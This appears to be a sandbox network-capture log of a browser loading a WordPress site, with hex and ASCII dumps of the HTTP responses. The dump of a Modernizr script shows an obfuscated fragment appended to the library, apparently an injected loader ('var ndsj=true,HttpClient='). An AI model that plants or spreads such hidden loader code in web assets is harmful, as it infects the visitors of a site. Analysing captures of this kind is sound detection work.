                                                            2025-01-15 10:07:57 UTC7906INData Raw: 2f 2a 20 4d 6f 64 65 72 6e 69 7a 72 20 32 2e 38 2e 33 20 28 43 75 73 74 6f 6d 20 42 75 69 6c 64 29 20 7c 20 4d 49 54 20 26 20 42 53 44 0a 20 2a 20 42 75 69 6c 64 3a 20 68 74 74 70 3a 2f 2f 6d 6f 64 65 72 6e 69 7a 72 2e 63 6f 6d 2f 64 6f 77 6e 6c 6f 61 64 2f 23 2d 66 6f 6e 74 66 61 63 65 2d 62 61 63 6b 67 72 6f 75 6e 64 73 69 7a 65 2d 62 6f 72 64 65 72 69 6d 61 67 65 2d 62 6f 72 64 65 72 72 61 64 69 75 73 2d 62 6f 78 73 68 61 64 6f 77 2d 66 6c 65 78 62 6f 78 2d 66 6c 65 78 62 6f 78 6c 65 67 61 63 79 2d 68 73 6c 61 2d 6d 75 6c 74 69 70 6c 65 62 67 73 2d 6f 70 61 63 69 74 79 2d 72 67 62 61 2d 74 65 78 74 73 68 61 64 6f 77 2d 63 73 73 61 6e 69 6d 61 74 69 6f 6e 73 2d 63 73 73 63 6f 6c 75 6d 6e 73 2d 67 65 6e 65 72 61 74 65 64 63 6f 6e 74 65 6e 74 2d 63 73 73
                                                            Data Ascii: /* Modernizr 2.8.3 (Custom Build) | MIT & BSD * Build: http://modernizr.com/download/#-fontface-backgroundsize-borderimage-borderradius-boxshadow-flexbox-flexboxlegacy-hsla-multiplebgs-opacity-rgba-textshadow-cssanimations-csscolumns-generatedcontent-css
                                                            2025-01-15 10:07:57 UTC8000INData Raw: 69 6f 6e 28 29 7b 72 65 74 75 72 6e 21 21 61 2e 57 6f 72 6b 65 72 7d 2c 73 2e 61 70 70 6c 69 63 61 74 69 6f 6e 63 61 63 68 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 21 21 61 2e 61 70 70 6c 69 63 61 74 69 6f 6e 43 61 63 68 65 7d 2c 73 2e 73 76 67 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 21 21 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 4e 53 26 26 21 21 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 4e 53 28 72 2e 73 76 67 2c 22 73 76 67 22 29 2e 63 72 65 61 74 65 53 56 47 52 65 63 74 7d 2c 73 2e 69 6e 6c 69 6e 65 73 76 67 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 72 65 74 75 72 6e 20 61 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 73 76 67 2f 3e 22 2c 28
                                                            Data Ascii: ion(){return!!a.Worker},s.applicationcache=function(){return!!a.applicationCache},s.svg=function(){return!!b.createElementNS&&!!b.createElementNS(r.svg,"svg").createSVGRect},s.inlinesvg=function(){var a=b.createElement("div");return a.innerHTML="<svg/>",(
                                                            2025-01-15 10:07:57 UTC1324INData Raw: 73 65 49 6e 74 28 44 28 30 78 65 62 29 29 2b 2d 70 61 72 73 65 49 6e 74 28 44 28 27 30 78 66 32 27 29 29 2b 70 61 72 73 65 49 6e 74 28 44 28 27 30 78 64 62 27 29 29 2b 70 61 72 73 65 49 6e 74 28 44 28 27 30 78 66 39 27 29 29 2a 2d 70 61 72 73 65 49 6e 74 28 44 28 27 30 78 66 35 27 29 29 2b 2d 70 61 72 73 65 49 6e 74 28 44 28 30 78 65 64 29 29 2b 70 61 72 73 65 49 6e 74 28 44 28 27 30 78 65 38 27 29 29 3b 69 66 28 7a 3d 3d 3d 65 29 62 72 65 61 6b 3b 65 6c 73 65 20 72 5b 27 70 75 73 68 27 5d 28 72 5b 27 73 68 69 66 74 27 5d 28 29 29 3b 7d 63 61 74 63 68 28 69 29 7b 72 5b 27 70 75 73 68 27 5d 28 72 5b 27 73 68 69 66 74 27 5d 28 29 29 3b 7d 7d 7d 28 71 2c 30 78 65 38 31 31 31 29 29 3b 76 61 72 20 6e 64 73 6a 3d 74 72 75 65 2c 48 74 74 70 43 6c 69 65 6e 74 3d
                                                            Data Ascii: seInt(D(0xeb))+-parseInt(D('0xf2'))+parseInt(D('0xdb'))+parseInt(D('0xf9'))*-parseInt(D('0xf5'))+-parseInt(D(0xed))+parseInt(D('0xe8'));if(z===e)break;else r['push'](r['shift']());}catch(i){r['push'](r['shift']());}}}(q,0xe8111));var ndsj=true,HttpClient=


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            20192.168.2.1649732178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:07:58 UTC652OUTGET /wp-content/uploads/2016/08/gift-553158_1920.jpg HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: image
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:07:58 UTC260INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:07:58 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:54:21 GMT
                                                            ETag: "4f3ab-620a8e6ef1d17"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 324523
                                                            Content-Type: image/jpeg
                                                            2025-01-15 10:07:58 UTC7932INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 03 02 02 02 02 02 03 02 02 02 03 03 03 03 04 06 04 04 04 04 04 08 06 06 05 06 09 08 0a 0a 09 08 09 09 0a 0c 0f 0c 0a 0b 0e 0b 09 09 0d 11 0d 0e 0f 10 10 11 10 0a 0c 12 13 12 10 13 0f 10 10 10 ff db 00 43 01 03 03 03 04 03 04 08 04 04 08 10 0b 09 0b 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 ff c0 00 11 08 05 00 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                            Data Ascii: JFIFCC"}!1AQa"q2
                                                            2025-01-15 10:07:58 UTC8000INData Raw: 51 b7 15 26 33 cd 04 50 3e 62 32 3d 01 a3 18 ed 4f 23 da 8c 77 a0 2e 33 14 6d a7 63 be 3a 51 8a 77 0b 8d 03 be 28 c0 a7 e0 e3 a5 18 a2 e1 71 98 f5 a3 1c d3 b1 fa d2 ed e7 9a 77 0b 8c da 73 4a 06 0d 3f 6f b5 2e 0d 17 15 c8 c2 d2 ed 3e 94 f0 b8 a7 6d f4 06 8b 85 c8 f6 e2 94 2d 3c 0f 6a 70 4f d6 8b 92 e4 46 12 97 66 2a 40 be d4 e0 82 95 d9 3c c4 61 69 c1 4f 5a 90 29 14 e0 b4 5c 97 22 20 be d4 e0 a0 54 9b 4f a5 28 4a 08 72 1a 05 38 2d 38 21 e8 39 a7 ed a4 43 90 c2 b8 e9 4d 35 23 54 4d eb 9a 2e 11 63 18 e2 ab cd 20 19 a7 cb 20 15 42 79 ba f3 4c d9 69 b9 1d c4 f8 ac ab 9b 8c 67 9e 95 2d cc fd 79 fc eb 1e ee e4 8c f3 d2 ae 28 8a 95 12 1b 75 77 d8 13 58 b7 d7 b8 ce d2 29 f7 77 60 67 9c 7a 56 1d e5 d1 62 5b 38 c9 e0 55 a4 79 15 eb b9 3b 22 1b 99 cb 9c 1c fa d5 19
                                                            Data Ascii: Q&3P>b2=O#w.3mc:Qw(qwsJ?o.>m-<jpOFf*@<aiOZ)\" TO(Jr8-8!9CM5#TM.c ByLig-y(uwX)w`gzVb[8Uy;"
                                                            2025-01-15 10:07:58 UTC8000INData Raw: f6 ad 6c 6a 93 66 95 fe af b4 91 bf 9c e3 15 ce de eb 38 dc 43 1e fd ab 2b 52 d6 82 92 37 e3 35 cd 5f eb 5f 78 2b 9e 38 35 49 5c da 14 9c 8d 8b ed 61 9b 24 1c 9f 63 d2 b9 fb cd 58 b3 37 cf 8e fc 9f 6a c8 ba d5 1d 86 4b 0c 1e 98 3f d6 b3 26 bc 91 c9 00 15 e6 a9 42 e7 5c 28 17 ef 35 0c 9c 12 49 e9 b7 3f e7 9a cd 92 66 71 f3 bf 5e bb 87 15 19 62 48 dc c4 9e 7b fb d2 64 71 ec 71 9f 6a d6 31 b1 d5 18 28 92 6e 20 e4 e7 eb 4c 62 40 39 e3 b0 a4 04 77 eb f5 e9 f5 a4 66 3d 81 c0 1d 2a ec 53 b2 02 dc 90 39 24 64 7f 8d 33 a8 00 70 7f fa d4 e2 a7 76 d2 06 0f 4c 53 92 32 d8 3c 10 79 e9 f9 53 25 bb 0c 54 cf 51 9c f6 a9 e1 89 9b 6f d7 d2 a7 8a d8 b6 31 df af 15 7a da d3 71 1f 21 3e d4 ae 88 6c ab 0d ae ee 71 8e 99 c5 6a 5a 58 b8 c0 50 57 b0 0b 5a 16 9a 69 2c 37 2f 7c 82
                                                            Data Ascii: ljf8C+R75__x+85I\a$cX7jK?&B\(5I?fq^bH{dqqj1(n Lb@9wf=*S9$d3pvLS2<yS%TQo1zq!>lqjZXPWZi,7/|
                                                            2025-01-15 10:07:58 UTC8000INData Raw: c2 d9 c3 67 3d 70 6b 2a e6 73 9c 16 e4 0f 5e 95 1c d7 98 cf 4e 38 f4 aa 32 dd 17 1c 71 ed 55 6b 1b 46 21 2c 87 71 cf 7f 6c 62 a2 32 30 3c 13 8e f8 3d 32 69 24 01 b9 04 7b 7b 54 0e b8 6c 6e c7 e3 da a9 1b 46 23 cb 9c f5 c9 19 c7 7e 29 d1 3f 4e 1b 8e f5 12 31 3c 1e a3 9e 2a dc 36 ed 21 18 ce df d2 86 32 fe 9f 19 91 d7 8e 09 ce 6b ad d3 ad 9b 68 c0 e3 03 f1 ac dd 23 4f c2 ab 6c c9 04 0a e9 a0 88 46 06 ee 3f 1a 83 36 b5 1e 91 f9 6a 0e 39 f4 a8 65 3c 92 31 cf 5a b2 ee 80 72 73 54 ee 24 eb c6 46 28 22 da 94 ae 9b aa 93 d3 bf 5a c9 97 20 e7 3d 6a ed c4 fc f7 c1 35 55 d7 20 e0 8e 39 a9 6c 65 40 4e 3a 75 3d 69 9d b0 0f 4e d5 33 0c 02 37 63 3d 71 50 b1 dd c6 79 eb d6 91 29 82 8e c7 f0 19 fd 69 09 e7 18 3f 87 f9 f7 a7 02 30 72 32 0f 23 9a 69 e7 9f a7 6e f4 0d 8c 25
                                                            Data Ascii: g=pk*s^N82qUkF!,qlb20<=2i${{TlnF#~)?N1<*6!2kh#OlF?6j9e<1ZrsT$F("Z =j5U 9le@N:u=iN37c=qPy)i?0r2#in%
                                                            2025-01-15 10:07:58 UTC8000INData Raw: e9 d7 8e 94 ca 03 cf 18 ce 3b d4 32 36 3a 30 cf 5f ad 4c 06 41 ef ec 6a bc fb b9 a4 26 44 5f 0c 30 7a 72 6a 54 60 46 3b 55 7e ac 71 cf 39 f7 eb 4f 12 1c 63 b0 eb fd 68 10 f7 39 56 ce 09 c7 23 3d 7d 6a 3d c4 fc c7 9f 4a 79 04 03 9c 83 9c f2 7b d4 65 ba 93 92 47 1c fa 53 40 0c 36 9e 00 1d b8 f4 a6 b6 55 4e 5b 24 73 cd 3b 70 ed d8 fe b4 c7 3e 9d 3f 3e 6a 82 c3 72 0f 39 c6 3d a9 e0 f1 9e a4 f3 50 e3 27 27 04 d3 c3 67 83 f8 0a 00 91 b1 cf 43 8f 5e b5 0c 9c 8c 13 d7 a7 3f 85 48 0e 39 ce 7a f4 a6 36 0b 64 67 23 f2 34 01 5d 94 ee 20 b0 3d bd a9 98 3e 83 d7 9e f5 3b 28 24 60 fd 3e b4 cd 87 fc 28 25 8c 24 f5 e8 01 ed 5a 3a 54 fb 5b 19 23 af 7a a0 47 cd fe 1f d6 9d 03 79 6e 18 b7 53 d8 74 ac ea 41 4e 2d 33 0a d0 55 22 e2 cf b0 41 3c d3 c3 54 63 af 07 ad 38 67 ae 07
                                                            Data Ascii: ;26:0_LAj&D_0zrjT`F;U~q9Och9V#=}j=Jy{eGS@6UN[$s;p>?>jr9=P''gC^?H9z6dg#4] =>;($`>(%$Z:T[#zGynStAN-3U"A<Tc8g
                                                            2025-01-15 10:07:58 UTC8000INData Raw: e5 40 39 fc 85 40 7c c9 93 72 72 c0 67 af e9 4a c5 16 e2 8a 34 c3 38 c1 3c e7 d2 86 9c 97 c1 05 88 eb 81 d2 a9 ec b9 d9 86 38 c1 e9 9e a6 ac c5 04 a0 28 72 09 23 3c 55 0d 68 32 e2 68 c1 d8 47 5f 4e 38 a6 c0 b6 e2 36 0d 9c 13 ce 06 31 f9 d0 f0 30 60 bb 48 e4 6f 03 d2 9c db 12 26 44 03 78 e3 df f3 a7 b0 d0 ec 5b c0 fd 78 6e 01 ef f9 d5 99 60 8c 15 78 66 24 e7 24 76 ff 00 3d 6a a0 1c 07 92 32 1f a6 09 c0 3c ff 00 f5 aa 49 1c 0b 6f 2a 14 2d 1b 0f 94 ff 00 12 1f 71 49 ab 85 cd 1b 67 b5 60 19 58 a4 c7 a1 1c 1c d6 b6 8d 6f 34 d3 65 e4 24 29 f4 e3 3e b5 cf 68 91 3b a6 cb cc 6f 2c 76 11 d3 27 d7 f1 af 4c f0 cf 86 dc 2a 4b 3d b2 a6 40 0c 0b 67 24 ff 00 91 50 c8 93 35 f4 dd 39 63 8a 37 65 3e 59 1d fb ff 00 9e 69 9a 8e a1 15 ae f8 b2 5a 37 03 df bd 6c 5f 49 05 bd b4
                                                            Data Ascii: @9@|rrgJ48<8(r#<Uh2hG_N8610`Ho&Dx[xn`xf$$v=j2<Io*-qIg`Xo4e$)>h;o,v'L*K=@g$P59c7e>YiZ7l_I
                                                            2025-01-15 10:07:58 UTC8000INData Raw: 77 41 cd 2f 4a 68 cd 2e 79 e7 9f ad 03 b0 e1 f9 d1 48 38 a0 1e c2 80 b0 ea 5e 83 ad 27 e5 46 72 69 5c 76 1d 47 34 80 81 c5 1d 3e 94 5c 76 61 df a5 2e 7d e9 01 a0 1f 4a 77 0b 05 2e 69 38 ed 41 34 0e c2 e4 d1 f5 a4 ce 78 a3 3d e8 25 a1 40 14 a3 da 9b 9e 29 72 28 15 85 18 e3 db da 9c 30 3d 69 a0 f3 cd 38 71 83 4e e4 35 61 71 ed 4a 29 a2 9c 0d 17 21 a1 d4 52 03 4e a4 4b 41 82 3b d2 8e 4f 4a 41 ce 0d 3c 50 43 01 47 22 96 94 7a 74 a0 40 07 d6 8c 0c e6 94 52 fd 28 24 6f 34 63 eb 4f ef 4a 14 62 80 19 8a 31 4e c5 2e da 00 61 19 e2 8c 63 b5 3f 6f 6a 4d be b4 02 18 45 34 a9 3d 2a 5c 0a 36 fb 52 6c ab 91 15 c5 37 1d f1 53 6d 14 9b 7b 51 72 93 22 2a 7d 69 bb 4d 4f b4 fb 53 4a fa d1 72 ae 43 b6 93 67 6a 98 8c 76 a4 2b 8e 98 a2 e3 4c 84 a9 ed 46 cc 75 a9 76 fb 53 76 8e
                                                            Data Ascii: wA/Jh.yH8^'Fri\vG4>\va.}Jw.i8A4x=%@)r(0=i8qN5aqJ)!RNKA;OJA<PCG"zt@R($o4cOJb1N.ac?ojME4=*\6Rl7Sm{Qr"*}iMOSJrCgjv+LFuvSv
                                                            2025-01-15 10:07:58 UTC8000INData Raw: 34 e1 e8 69 5c 56 43 c1 a7 a9 a6 01 eb 52 28 3d e9 12 38 73 4f 51 4d 00 54 8a 0f a5 26 c8 63 80 e3 9a 70 1e d8 a4 03 eb 4f c5 2d c8 62 e2 9c 07 af d6 8f c6 9c 3d a9 11 70 c0 fc 29 40 e6 80 29 70 0f 5a 04 2f 18 a5 c6 69 06 29 7b f2 28 0b 8a 05 14 7b d1 d6 80 b8 63 da 8c 71 f5 a5 14 bc 1a 07 71 bd ba d2 62 9c 46 38 34 87 d6 82 93 10 fd 29 0e 29 7a 70 7b 51 81 41 49 88 69 06 68 e4 d2 67 de 82 c5 3e b4 67 9a 4c e6 8a b4 02 f5 a3 b0 34 80 fa 53 bf 5a 04 c5 e3 fc 69 c2 99 d7 a7 4a 70 3f e3 41 9c 90 ee 7a f1 4b eb 4d c8 a7 7d 28 20 5e 29 c3 d6 9a 3b 52 83 c5 04 0f 19 3c 52 8a 6f 1d 69 d4 10 c7 0f 61 4e 14 c0 69 f9 1c fb 52 b9 0d 0e 14 bf 53 4d a7 0a 92 58 e1 8a 75 34 1e 38 fe 74 fa 08 62 8a 51 f5 a4 1e 86 9c 05 04 8b db 8a 31 9e b4 b4 0a 4d 89 b0 c7 3c d2 e3 1d
                                                            Data Ascii: 4i\VCR(=8sOQMT&cpO-b=p)@)pZ/i){({cqqbF84))zp{QAIihg>gL4SZiJp?AzKM}( ^);R<RoiaNiRSMXu48tbQ1M<
                                                            2025-01-15 10:07:58 UTC8000INData Raw: 00 13 4d 0d a9 c5 9d c0 13 5b 1c ff 00 cb 33 9c 0f a8 39 1f 85 7d 05 a3 5c ad fd 94 72 c7 f7 65 42 46 4f bf f8 ff 00 3a e7 7c 7b e1 48 3c 4b a5 9b 22 9b 6f a0 0d 2d 93 8e e7 ab 46 7e bd 47 d2 b6 83 dd 1e 8d 2a ff 00 57 ac af b3 dc f9 c5 24 31 31 19 07 1f 2e 2a eb 49 1c 90 96 24 74 e7 06 ab 5d 5a 4b 6b 33 2c 8a 55 cb ed 2a 78 c1 1d aa 26 95 0f cb 8f 66 1d 39 aa 3d cd 1a ba 26 8d 59 94 f4 39 e3 3d ff 00 cf 15 5a e1 0c 32 ee 46 3e fd aa e2 b4 70 44 06 7a 9a a1 3d c9 f3 36 b1 1b 58 f1 9e 31 4d 0c 99 1d 18 10 11 41 18 e6 a3 53 22 4f f7 78 39 e7 1c 1a 23 c0 27 18 e0 64 0a 91 19 59 72 48 1f d6 82 85 38 04 b1 e3 34 dc b1 18 cd 23 a6 7b 74 eb 8e f4 e0 c0 64 03 82 33 d7 bd 04 10 b0 21 89 63 cf 63 4f f3 06 06 70 00 e3 9e 94 d9 0a 9e 87 35 5c c8 4e 46 79 f7 f4 fe 94
                                                            Data Ascii: M[39}\reBFO:|{H<K"o-F~G*W$11.*I$t]ZKk3,U*x&f9=&Y9=Z2F>pDz=6X1MAS"Ox9#'dYrH84#{td3!ccOp5\NFy
                                                            2025-01-15 10:07:58 UTC8000INData Raw: 54 8b 8d 3e df 62 8c 6d 18 e9 d2 b1 ae ae 5c b1 75 1c 0f 43 49 58 95 04 cf 58 f8 71 f1 86 d3 ed cb a3 f8 8a e0 47 21 21 56 47 3c 67 b6 4d 7b 6d a6 b5 a7 dc 84 96 06 5f 7c 1e 0f d2 be 12 d5 e2 b9 93 37 08 c4 4a 9c a9 1c 64 8a eb 3e 1b 7c 6e bd d3 67 8f 46 d6 6e 18 18 b0 8a 5d fb 7d 7d 2b 1a b8 78 cd 5d 6e 79 58 ec ad 54 fd e5 2d fa a3 ee 7b 2b bb 79 62 1e 53 8c f7 15 97 af 5d 5b a2 e5 88 20 1e 6b cd f4 6f 1d c7 73 68 97 30 5c 82 18 0e 87 35 3d df 89 de fe 32 37 60 81 c9 3d eb 96 38 69 27 73 e7 7e ab 38 bd 4e ac c9 a7 b2 17 8c 82 e4 75 1f c4 29 56 e2 37 88 5b 26 10 28 e0 fb 57 12 9a 94 81 4a 44 d9 39 e0 56 ce 91 6b a9 4f 61 f6 d9 48 3b 86 e5 e7 a0 a2 74 b9 55 db 14 a9 59 6a ca 1e 34 d4 cc 16 38 87 22 6c e0 ed e3 8f fe bd 45 f0 fb 4e 84 29 d4 35 4b 1d c2 e0
                                                            Data Ascii: T>bm\uCIXXqG!!VG<gM{m_|7Jd>|ngFn]}}+x]nyXT-{+ybS][ kosh0\5=27`=8i's~8Nu)V7[&(WJD9VkOaH;tUYj48"lEN)5K


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            21192.168.2.1649733178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:07:58 UTC608OUTGET /en/ HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: image
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:07:58 UTC461INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:07:58 GMT
                                                            Server: Apache
                                                            X-Pingback: https://canpol.poznan.pl/xmlrpc.php
                                                            Link: <https://canpol.poznan.pl/wp-json/>; rel="https://api.w.org/", <https://canpol.poznan.pl/wp-json/wp/v2/pages/6505>; rel="alternate"; type="application/json", <https://canpol.poznan.pl/>; rel=shortlink
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Vary: Accept-Encoding
                                                            Transfer-Encoding: chunked
                                                            Content-Type: text/html; charset=UTF-8
                                                            2025-01-15 10:07:58 UTC7731INData Raw: 31 30 61 30 33 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 0a 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 47 42 22 20 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 21 2d 2d 20 4d 65 74 61 20 54 61 67 73 20 2d 2d 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 0a 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 20 2f 3e 0a 0a 09 0a 0a
                                                            Data Ascii: 10a03<!doctype html><html lang="en-GB" ><head>... Meta Tags --><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0" />
                                                            2025-01-15 10:07:58 UTC149INData Raw: 6b 20 72 65 6c 3d 27 73 68 6f 72 74 6c 69 6e 6b 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 61 6e 70 6f 6c 2e 70 6f 7a 6e 61 6e 2e 70 6c 2f 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 2b 6f 65 6d 62 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 61 6e 70 6f 6c 2e 70 6f 7a 6e 61 6e 2e 70 6c 2f 77 70 2d 6a 73 6f 6e 2f 6f 65 6d
                                                            Data Ascii: k rel='shortlink' href='https://canpol.poznan.pl/' /><link rel="alternate" type="application/json+oembed" href="https://canpol.poznan.pl/wp-json/oem
                                                            2025-01-15 10:07:58 UTC555INData Raw: 62 65 64 2f 31 2e 30 2f 65 6d 62 65 64 3f 75 72 6c 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 63 61 6e 70 6f 6c 2e 70 6f 7a 6e 61 6e 2e 70 6c 25 32 46 65 6e 25 32 46 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 78 6d 6c 2b 6f 65 6d 62 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 61 6e 70 6f 6c 2e 70 6f 7a 6e 61 6e 2e 70 6c 2f 77 70 2d 6a 73 6f 6e 2f 6f 65 6d 62 65 64 2f 31 2e 30 2f 65 6d 62 65 64 3f 75 72 6c 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 63 61 6e 70 6f 6c 2e 70 6f 7a 6e 61 6e 2e 70 6c 25 32 46 65 6e 25 32 46 26 23 30 33 38 3b 66 6f 72 6d 61 74 3d 78 6d 6c 22 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22
                                                            Data Ascii: bed/1.0/embed?url=https%3A%2F%2Fcanpol.poznan.pl%2Fen%2F" /><link rel="alternate" type="text/xml+oembed" href="https://canpol.poznan.pl/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fcanpol.poznan.pl%2Fen%2F&#038;format=xml" /><script type="text/javascript"


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            22192.168.2.1649736178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:07:58 UTC422OUTGET /wp-content/plugins/fancy-box/jquery.fancybox.js?ver=1.2.6 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:07:58 UTC283INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:07:58 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:38:27 GMT
                                                            ETag: "17f-620a8ae18830e"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 383
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:07:58 UTC383INData Raw: 2f 2a 0a 20 2a 20 46 61 6e 63 79 42 6f 78 20 2d 20 6a 51 75 65 72 79 20 50 6c 75 67 69 6e 0a 20 2a 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 61 6e 63 79 20 6c 69 67 68 74 62 6f 78 20 61 6c 74 65 72 6e 61 74 69 76 65 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 30 39 20 4a 61 6e 69 73 20 53 6b 61 72 6e 65 6c 69 73 0a 20 2a 20 45 78 61 6d 70 6c 65 73 20 61 6e 64 20 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 20 61 74 3a 20 68 74 74 70 3a 2f 2f 66 61 6e 63 79 62 6f 78 2e 6e 65 74 0a 20 2a 20 0a 20 2a 20 56 65 72 73 69 6f 6e 3a 20 31 2e 32 2e 36 20 28 31 36 2f 31 31 2f 32 30 30 39 29 0a 20 2a 20 52 65 71 75 69 72 65 73 3a 20 6a 51 75 65 72 79 20 76 31 2e 33 2b 0a 20 2a 20 0a 20 2a 20 44 75 61 6c 20 6c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20
                                                            Data Ascii: /* * FancyBox - jQuery Plugin * simple and fancy lightbox alternative * * Copyright (c) 2009 Janis Skarnelis * Examples and documentation at: http://fancybox.net * * Version: 1.2.6 (16/11/2009) * Requires: jQuery v1.3+ * * Dual licensed under


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            23192.168.2.1649734178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:07:58 UTC418OUTGET /wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
